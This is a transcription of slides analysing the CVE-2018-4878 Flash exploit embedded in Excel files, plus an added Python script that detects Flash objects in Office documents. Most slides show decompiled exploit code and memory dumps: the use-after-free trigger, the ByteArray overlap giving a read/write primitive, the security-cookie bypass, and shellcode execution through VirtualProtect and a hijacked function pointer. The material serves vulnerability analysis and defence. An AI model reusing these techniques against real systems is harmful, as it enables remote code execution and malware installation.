Slide 1

Transcription:

Office document files: the Flash object insertion feature

Malicious Flash file embedded in Excel (CVE-2018-4878). User interaction? None is needed: the Flash object runs automatically, except when the file is opened in Protected View.

Delivery chain: e-mail, messenger or SNS -> Office document (exploit.xslx) -> Flash exploit -> malware
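The delivery vector above is an Office Open XML workbook carrying a Flash object. As an added example that is not part of the slides, the following Python triage helper scans an OOXML file (a zip container) for the two traces such an embedding leaves: a part that references the Shockwave Flash ActiveX CLSID, and a part that starts with an SWF container signature. The CLSID value and the SWF signatures are well-known constants, not taken from the slides; the sample workbook built by `build_sample` is constructed here and is a minimal stand-in for a real .xlsx, whose exact part layout does not matter because the scan is content-based.

```python
"""Triage helper (added example, not from the slides): flag Office Open XML
files that carry an embedded Flash object, the delivery vector described
above for CVE-2018-4878."""
import io
import re
import zipfile

# CLSID of the Shockwave Flash ActiveX control (well-known value, not from the slides).
FLASH_CLSID = "D27CDB6E-AE6D-11CF-96B8-444553540000"
# SWF container signatures: uncompressed, zlib-compressed, LZMA-compressed.
SWF_MAGICS = (b"FWS", b"CWS", b"ZWS")
_CLSID_RE = re.compile(re.escape(FLASH_CLSID).encode(), re.IGNORECASE)
_SKIPPED = "oversized part, not scanned"


def find_flash_objects(data: bytes) -> list:
    """Return (member_name, reason) pairs for every zip member that either
    references the Flash ActiveX CLSID or starts with an SWF signature.
    Non-zip input (a legacy .xls, a stray file) yields an empty list."""
    findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings
    with zf:
        for info in zf.infolist():
            if info.file_size > 50 * 1024 * 1024:  # do not inflate zip-bomb sized parts
                findings.append((info.filename, _SKIPPED))
                continue
            blob = zf.read(info)
            if blob[:3] in SWF_MAGICS:
                findings.append((info.filename, "SWF signature %s" % blob[:3].decode()))
            if _CLSID_RE.search(blob):
                findings.append((info.filename, "Flash ActiveX CLSID reference"))
    return findings


def is_suspicious(data: bytes) -> bool:
    """True when at least one scanned part shows a Flash trace."""
    return any(reason != _SKIPPED for _, reason in find_flash_objects(data))


def build_sample(with_flash: bool) -> bytes:
    """Constructed minimal workbook-like zip for demonstration purposes only.
    A real .xlsx has more parts; the ActiveX XML below is a simplified stand-in."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("xl/workbook.xml", "<workbook/>")
        if with_flash:
            # mixed-case CLSID, as Office writes it; the scan is case-insensitive
            zf.writestr("xl/activeX/activeX1.xml",
                        '<ax:ocx ax:classid="{d27cdb6e-ae6d-11cf-96B8-444553540000}"/>')
            # zlib-compressed SWF header followed by constructed filler bytes
            zf.writestr("xl/embeddings/oleObject1.bin", b"CWS\x0f" + b"\x00" * 32)
    return buf.getvalue()


if __name__ == "__main__":
    print("clean:", find_flash_objects(build_sample(False)))
    print("flash:", find_flash_objects(build_sample(True)))
```

Run it on a real file with `find_flash_objects(open(path, "rb").read())`; a hit on either trace is a reason to keep the document in Protected View or quarantine it for analysis, which is exactly the state in which the slides note the exploit does not auto-run.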

Exploit flow (Office document, Flash loader, Flash exploit, C2 server):
    1. Office: the document loads the Flash loader object.
    2. Flash (loader) -> C2 server: request the decode XOR key, sending the swf id, Flash version and OS version.
    3. C2 server -> Flash (loader): return the decode XOR key; the loader decodes and loads the exploit.
    4. Flash (exploit) -> C2 server: request the payload.
    5. C2 server -> Flash (exploit): return the payload.
    The C2 server (marked as important on the slide) holds both the key and the payload.

Exploit loader: the Flash object

Decompiled exploit loader: Exploit (CVE-2018-4878), decode, load

Exploit decode function (Decrypt?): decode, then load the exploit

Exploit Flash file

Vulnerability root cause (Use After Free): PrimeTime SDK DRMManager (com.adobe.tvsdk.mediacore.psdk). Decompiled trigger, with the slide's annotation that drm_obj1 = null puts the listener on the delayed free list:

    public function trig_uaf() : void {
        var ps:psdk = null;
        // 1. create the media player
        var data14:psdkeventdispatcher = null;
        ps = PSDK.pSDK;
        data14 = ps.createdispatcher();
        this.\x04 = ps.createmediaplayer(data14);
        // 2. initialize the DRMManager
        this.drm_obj1 = new DRMLIST_Obj();   // DRMOperationCompleteListener
        this.\x04.drmmanager.initialize(this.drm_obj1);
        // 3. null the DRMOperationCompleteListener (the drmmanager keeps referencing the object)
        this.drm_obj1 = null;   // enters the delayed free list
    }

Force Garbage Collect (after trig_uaf() the nulled drm_obj1 is freed):

    public function \x01(param1:flash01) {
        super();
        this.flash01_obj = param1;
        this.trig_uaf();   // drm_obj1 = null (freed)
        try {
            new LocalConnection().connect("foo");
            new LocalConnection().connect("foo");   // force garbage collection
        }

Force Garbage Collect

DRMOperationCompleteListener class object reallocation (the second connect() raises an error, and the catch block reallocates the listener type):

        try {
            new LocalConnection().connect("foo");   // error raised here
            new LocalConnection().connect("foo");
        } catch(e:error) {
            drm_obj2 = new DRMLIST_Obj();   // used as the dangling pointer
        }

Make Dangling Pointer (drm_obj2):

        // start a Timer
        this.\x03 = new Timer(100,1000);
        this.\x03.addeventlistener("timer",this.checkfreed);
        this.\x03.start();
        // flash.display::loaderinfo -> ondrmerror -> drm_obj2 freed
    }

drm_obj2 is freed by the drmmanager while the ActionScript reference to it remains.

Overlap ByteArray Class Object:

    public function overlapping_obj() : void {
        this.barray_obj = new ByteArrayObj();   // overlap a ByteArray class object onto the freed drm_obj2
        this.barray_obj.length = 512;
        if(this.drm_obj2.a14 != 0)   // drm_obj2 is the dangling pointer
        {
            ..

ByteArray full-memory read/write primitive: the relevant fields of the ByteArray buffer object:

    private:
        uint8_t* array;
        uint32_t capacity;
        uint32_t length;
        uint32_t copyonwrite;
        uint32_t check_array;
        uint32_t check_capacity;
        uint32_t check_length;
        uint32_t check_copyonwrite;

Overlapped Object Memory

[drm_obj2 class memory] before it is freed:

    07689100 5bda1a88 AdobeCPGetAPI+0x4de208
    07689104 80004b01
    07689108 077b61a0
    0768910c 0778b208
    07689110 00001111 -> drm_obj2.a1
    07689114 00002222
    07689118 00003333
    0768911c 00004444
    07689120 00005555
    07689124 00006666
    07689128 00007777
    0768912c 00008888
    07689130 00009999
    07689134 0000aaaa
    07689138 00001111
    0768913c 00002222
    07689140 00003333
    ..
    07689174 00006666
    07689178 00007777
    0768917c 00008888
    07689180 00009999
    07689184 0000aaaa
    07689188 00001111
    0768918c 00002222
    07689190 00003333
    07689194 00004444
    07689198 00004444 -> drm_obj2.a35
    0768919c 00000000

Overlapped ByteArray class object at the same address:

    07689100 5bda18d8 AdobeCPGetAPI+0x4de058
    07689104 00000003
    07689108 076ad858
    0768910c 07796fa0
    07689110 07689118 -> drm_obj2.a1
    07689114 00000044
    07689118 5bda1880 AdobeCPGetAPI+0x4de000
    0768911c 5bda1888 AdobeCPGetAPI+0x4de008
    07689120 5bda187c AdobeCPGetAPI+0x4ddffc
    07689124 5bde9984 AdobeCPGetAPI+0x526104
    07689128 0781f4c0
    0768912c 08f1c1f0
    07689130 07ba5e80
    ..
    07689140 5bdb3db0 <ByteArray Object>
    07689144 08a45050 -> m_buffer object (drm_obj2.a14)
    07689148 00000000
    0768914c 00000000
    07689150 5bda1874 Flash32_28_0_0_137!AdobeCPGetAPI+0x4ddff4
    07689154 00000003
    07689158 00000000
    0768915c 00000011 -> barray_obj.a1
    ..
    07689188 07689101 -> barray_obj (this)
    0768918c 00000001
    07689190 00000000
    07689194 00000000
    07689198 00000000 -> drm_obj2.a35
    0768919c 00000000

Object Life Cycle

Make Fake m_buffer Object:

        if(this.drm_obj2.a14 != 0) {   // check that the overlap succeeded
            for(var i:int = 0; i < 5; i++) {
                ..
                // 1. write a.14 (m_buffer) into a.32 of the dangling pointer
                this.drm_obj2.a32 = this.drm_obj2.a14 + 8 * i + 7;
                // 2. a.32 of the dangling pointer is barray_obj.a13 (Number type); write and read the Number value through the ByteArray
                // 3. write the m_buffer object data read back into the barray_obj variable area, building the fake m_buffer object
                this.barray_obj.write_mbuffer_obj(i * 2 + 1, this.barray_obj.read_mbuffer_obj());
            }
            // 4. change a.14 (the real m_buffer address) to the address of barray_obj.a1 (the fake m_buffer pointer)
            this.drm_obj2.a14 = this.drm_obj2.a31 + 19 * 4 + 16 - 1;

Full r/w memory primitive (memory after the fake m_buffer is in place):

    07689100 5bda18d8 AdobeCPGetAPI+0x4de058
    07689104 00000003
    07689108 076ad858
    0768910c 07796fa0
    07689110 07689118
    ..
    07689140 5bdb3db0 <ByteArray Object>
    07689144 (0768915c) -> fake m_buffer
    07689148 00000000
    0768914c 00000000
    07689150 5bda1874 Flash32_28_0_0_137!AdobeCPGetAPI+0x4ddff4
    07689154 00000003
    07689158 00000000
    (0768915c) 52571868
    07689160 00000001
    07689164 00000000 -> array
    07689168 ffffffff -> capacity
    0768916c ffffffff -> length
    07689170 00000000 -> copyonwrite
    07689174 1778926e -> check_array
    07689178 e8876d91 -> check_capacity
    0768917c e8876d91 -> check_length
    07689180 1778926e -> check_copyonwrite
    07689184 00000000
    07689188 07689101
    0768918c 07e25239
    07689190 00000000
    ..

Bypass ByteArray security cookie mitigation. Each field of the buffer object is protected by a check_ copy XORed with a per-object key; because the dangling pointer gives read access to both a field and its check value, the key is recovered as their XOR and the check values are recomputed after the fields are rewritten (field offsets follow the dump above: a22 = array, a23 = capacity, a24 = length, a25 = copyonwrite, a26 to a29 = the check_ copies):

        // key = array ^ check_array
        var key:uint = this.drm_obj2.a22 ^ this.drm_obj2.a26;
        this.drm_obj2.a22 = 0;            // array
        this.drm_obj2.a23 = 0xFFFFFFFF;   // capacity
        this.drm_obj2.a24 = 0xFFFFFFFF;   // length
        this.drm_obj2.a26 = this.drm_obj2.a22 ^ key;   // check_array
        this.drm_obj2.a27 = this.drm_obj2.a23 ^ key;   // check_capacity
        this.drm_obj2.a28 = this.drm_obj2.a24 ^ key;   // check_length
        this.drm_obj2.a29 = this.drm_obj2.a25 ^ key;   // check_copyonwrite
        this.barray_obj.endian = Endian.LITTLE_ENDIAN;

Find window function address: vtable address -> Flash.ocx base address -> search API address. Decompiled (as shown on the slide, with elisions):

    static function findvp() : uint {
        if(flash21.readutf().tolowercase() == virtualprotect {
            flash63 = Get(b + ft + \x1e\x0b * 4);
            c++;
            if(c > 1)
            ..
        else {
            flash21.position = b + b0;
            if(flash21.readutf().tolowercase() == createprocessa {
                createprocessafunc = Get(b + ft + \x1e\x0b * 4);
                c++;
                if(c > 1) {
                    break;
                }
            }

How to call shellcode: the HackingTeam Flash exploit method is reused (back to 2015):

    // 1. declare a dummy victim function
    static function Payload(...a){}
    static function CallVP(vp:uint, xaddr:uint, xlen:uint) {
        // 2. create the Payload function object
        Payload();
        // 3. find the vtable pointer in the Payload() object
        var p:uint = GetAddr(Payload);
        var ptbl:uint = Get(Get(Get(Get(p + 8) + 0x14) + 4) + (_isdbg ? 0xbc : 0xb0));
        ..
        // 4. copy Payload's vtable
        for(var i:uint; i < 0x100; i++) _v[i] = Get(p1 - 0x80 + i*4);
        // 5. store the VirtualProtect() address
        _v[0x20+7] = vp;
        // 6. set the VirtualProtect() arguments
        Set(p+0x1c, xaddr);
        Set(p+0x20, xlen);
        var args:array = new Array(0x41);   // set third arg = 0x40 PAGE_EXECUTE_READWRITE
        // 7. replace Payload()'s vtable
        Set(ptbl, _vaddr + 0x80);
        // 8. call VirtualProtect()
        var res = Payload.call.apply(null, args);

How to call shellcode: tampering with the call address used by the Function object's apply. The AVM source of the method whose call pointer is replaced:

    Atom FunctionObject::AS3_apply(Atom thisArg, Atom argArray)
    {
        thisArg = get_coerced_receiver(thisArg);
        // when argArray == undefined or null, same as not being there at all
        // see Function/e15_3_4_3_1.as
        if (!AvmCore::isNullOrUndefined(argArray)) {
            AvmCore* core = this->core();
            // FIXME: why not declare argArray as Array in Function.as?
            if (!AvmCore::istype(argArray, ARRAY_TYPE))
                toplevel()->throwTypeError(kApplyError);
            return core->exec->apply(get_callEnv(), thisArg, (ArrayObject*)AvmCore::atomToScriptObject(argArray));
        } else {

How to call shellcode: tampering with the call address used by the Function object's apply (continued)

How to call shellcode: the decompiled callvp from the CVE-2018-4878 sample:

    static function callvp(param1:uint, param2:uint, param3:uint) : * {
        var _loc10_:uint = 0;
        flash1000();
        var _loc4_:uint = GetObjAddr(flash1000);
        var _loc5_:uint = Get(Get(Get(_loc4_ + 8) + 20) + 4) + (!!flash70 ? 188 : 176);
        ..
        var _loc9_:vector.<uint> = new Vector.<uint>(256);
        while(_loc10_ < 256) {
            _loc9_[_loc10_] = Get(_loc6_ - 128 + _loc10_ * 4);
            _loc10_++;
        }
        _loc9_[32 + 7] = param1;
        Set(_loc4_ + 28,param2);   // first parameter (shellcode address)
        Set(_loc4_ + 32,param3);   // second parameter (shellcode length)
        Set(_loc5_,flash36(_loc9_) + 128);   // overwrite the apply call pointer
        var _loc11_:array = new Array(65);   // third parameter (memory protection flag)
        var _loc12_:* = flash1000.call.apply(null,_loc11_);   // call VirtualProtect
        Set(_loc5_,_loc6_);
        Set(_loc4_ + 28,_loc7_);
        Set(_loc4_ + 32,_loc8_);

How to call shellcode: the VirtualProtect call parameters

How to call shellcode: the function call pointer of the dummy function is replaced with the shellcode address (before: dummy function; after: shellcode):

    static function Exec() : * {
        ..
        payaddr = GetObjAddr(flash1000);
        payaddr = Get(Get(payAddr + 0x1C) + 8) + 4;
        flash69 = Get(payAddr);
        // overwrite the function call pointer with the shellcode address
        Set(payAddr,shellcodeAddr);
        // call CreateProcessA
        res = flash1000.call(null,createprocessafunc);
        ..
    }

How to call shellcode: the shellcode

Mitigations. When exploitation of Flash vulnerabilities rose in the past, the update policy was changed from manual to automatic updates.

Protected View (제한된 보기)

Protected View

Flash loading notification dialog

Flash loading notification dialog

End of Flash support announced for the end of 2020. Ref: https://theblog.adobe.com/adobe-flash-update/

Internet Explorer and the Edge browser. Ref: https://blogs.windows.com/msedgedev/2017/07/25/flash-on-windows-timeline/#etdkmp71exskesz6.97

Google Chrome. Ref: https://www.blog.google/products/chrome/saying-goodbye-flash-chrome/

Flash -> HTML5